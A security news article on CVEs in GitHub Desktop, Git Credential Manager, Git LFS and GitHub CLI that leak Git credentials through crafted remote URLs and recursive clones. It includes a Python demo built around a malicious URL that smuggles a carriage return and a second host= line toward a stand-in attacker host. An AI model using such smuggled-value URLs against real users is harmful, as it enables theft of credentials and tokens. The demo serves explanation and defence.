
A vulnerability in GitHub Desktop lets maliciously crafted remote URLs leak Git credentials.

Multiple security vulnerabilities have been disclosed in GitHub Desktop and other Git-related projects that, if exploited, could allow attackers to gain unauthorized access to a user's Git credentials.

According to GMO Flatt Security researcher Ry0taK, who identified the flaws, "Git uses the Git Credential Protocol to retrieve credentials from the credential helper. Due to improper message handling, numerous projects became susceptible to credential leaks in various ways," he explained in an analysis published on Sunday.

The identified vulnerabilities are as follows:

  • CVE-2025-23040 (CVSS score: 6.6) – Maliciously crafted remote URLs could lead to credential leaks in GitHub Desktop
  • CVE-2024-50338 (CVSS score: 7.4) – Carriage-return character in remote URL allows the malicious repository to leak credentials in Git Credential Manager
  • CVE-2024-53263 (CVSS score: 8.5) – Git LFS permits retrieval of credentials via crafted HTTP URLs
  • CVE-2024-53858 (CVSS score: 6.5) – Recursive repository cloning in GitHub CLI can leak authentication tokens to non-GitHub submodule hosts


The Git Credential Protocol delimits each key=value line of a credential message with the newline control character ("\n"). The research showed that GitHub Desktop's handling of those messages is vulnerable to carriage return ("\r") smuggling: a "\r" embedded in a crafted remote URL is also treated as a line break, so an attacker can inject an extra field such as a second host= line and have the credentials for a legitimate host sent to an attacker-controlled one.


“By using a maliciously crafted URL, it’s possible to cause the credential request from Git to be misinterpreted by GitHub Desktop, resulting in the credentials being sent to a different host than the one Git is communicating with, thus enabling secret exfiltration,” GitHub explained in an advisory.

A similar flaw was found in the Git Credential Manager NuGet package, where credentials can be returned for, and therefore exposed to, an unrelated host. Git LFS, for its part, was found not to check for embedded control characters in remote URLs, which allows CRLF injection through crafted HTTP URLs.
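To make the carriage-return smuggling described above concrete, the Python below is an added illustration written for this article; it is not code from Git, GitHub Desktop, Git Credential Manager or Git LFS, and it does not reproduce the researcher's proof-of-concept URLs. It serialises a credential request for a constructed remote URL in the shape of the Git Credential Protocol, then reads that request with two parsers: a lenient one that also treats "\r" as a line ending (the behaviour of a ReadLine-style API), and a strict one that splits on "\n" only and rejects control characters in any field. The URL, the host names attacker.example and github.com, the stored secret, and the decision to place the percent-encoded "\r" (%0D) in the URL's userinfo part are all assumptions made for the demo.

```python
"""Carriage-return smuggling against a Git-credential-protocol reader.

Added illustration for this article; it is NOT code from Git, GitHub Desktop,
Git Credential Manager or Git LFS.  The remote URL, host names, stored
credentials and request text below are constructed for the demo.
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed credential store: the helper only holds a secret for github.com.
STORE = {"github.com": ("octocat", "ghp_exampletoken")}

# Assumption: attacker-controlled remote that smuggles a second "host=" line
# through a percent-encoded carriage return (%0D) in the userinfo part.
MALICIOUS_URL = "https://x%0Dhost=github.com@attacker.example/repo.git"


def credential_request(url: str) -> str:
    """Serialise a request in the shape of the Git Credential Protocol:
    key=value lines delimited by "\\n" and terminated by a blank line.
    Only the message shape is mimicked here, not Git's own implementation."""
    parts = urlsplit(url)
    lines = [f"protocol={parts.scheme}", f"host={parts.hostname}"]
    if parts.username is not None:
        lines.append(f"username={unquote(parts.username)}")  # %0D -> "\r"
    return "\n".join(lines) + "\n\n"


def parse_lenient(request: str) -> dict:
    """Reader that accepts "\\r", "\\n" and "\\r\\n" as line endings, the way a
    ReadLine-style API does.  A value containing "\\r" is split into two
    lines, and the later "host=" overrides the one Git actually sent."""
    fields = {}
    for line in re.split(r"\r\n|\r|\n", request):
        if line:
            key, _, value = line.partition("=")
            fields[key] = value
    return fields


def parse_strict(request: str) -> dict:
    """Reader that splits only on "\\n" and rejects any field whose value
    carries a control character, so a smuggled "\\r" cannot start a line."""
    fields = {}
    for line in request.split("\n"):
        if not line:
            continue
        key, sep, value = line.partition("=")
        if not sep or re.search(r"[\x00-\x1f\x7f]", value):
            raise ValueError(f"control character in credential field {key!r}")
        fields[key] = value
    return fields


def lookup(parser, request: str):
    """Act as the helper: parse the request, return (host, secret) for that host."""
    fields = parser(request)
    return fields["host"], STORE.get(fields["host"])


def demo() -> dict:
    """Compare where Git connects with which host each reader believes it asked for."""
    request = credential_request(MALICIOUS_URL)
    result = {"git_connects_to": urlsplit(MALICIOUS_URL).hostname}
    result["lenient_host"], result["lenient_secret"] = lookup(parse_lenient, request)
    try:
        lookup(parse_strict, request)
        result["strict"] = "accepted"
    except ValueError as exc:
        result["strict"] = f"rejected ({exc})"
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The lenient reader hands back the github.com secret for a request whose first host= line names attacker.example, the host Git is actually talking to; the strict reader refuses the request outright. That refusal, applied to every field on both sides of the protocol, is the check a credential helper and Git itself need before a remote URL is allowed to drive a credential lookup.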

The GitHub CLI issue stems from the fact that, during a recursive clone, the CLI instructs Git to send an access token to hosts other than github[.]com and ghe[.]com whenever the GITHUB_ENTERPRISE_TOKEN or GH_ENTERPRISE_TOKEN environment variable is set, or whenever GITHUB_TOKEN is set and CODESPACES is enabled (set to "true").

“While the enterprise-related variables are less common, the CODESPACES environment variable is always set to ‘true’ when running on GitHub Codespaces,” Ry0taK noted. “Thus, cloning a malicious repository in GitHub Codespaces using GitHub CLI will always leak the access token to the attacker’s hosts.”

An attacker who successfully exploits any of these vulnerabilities can use the leaked authentication tokens to access resources the victim is authorized to reach.
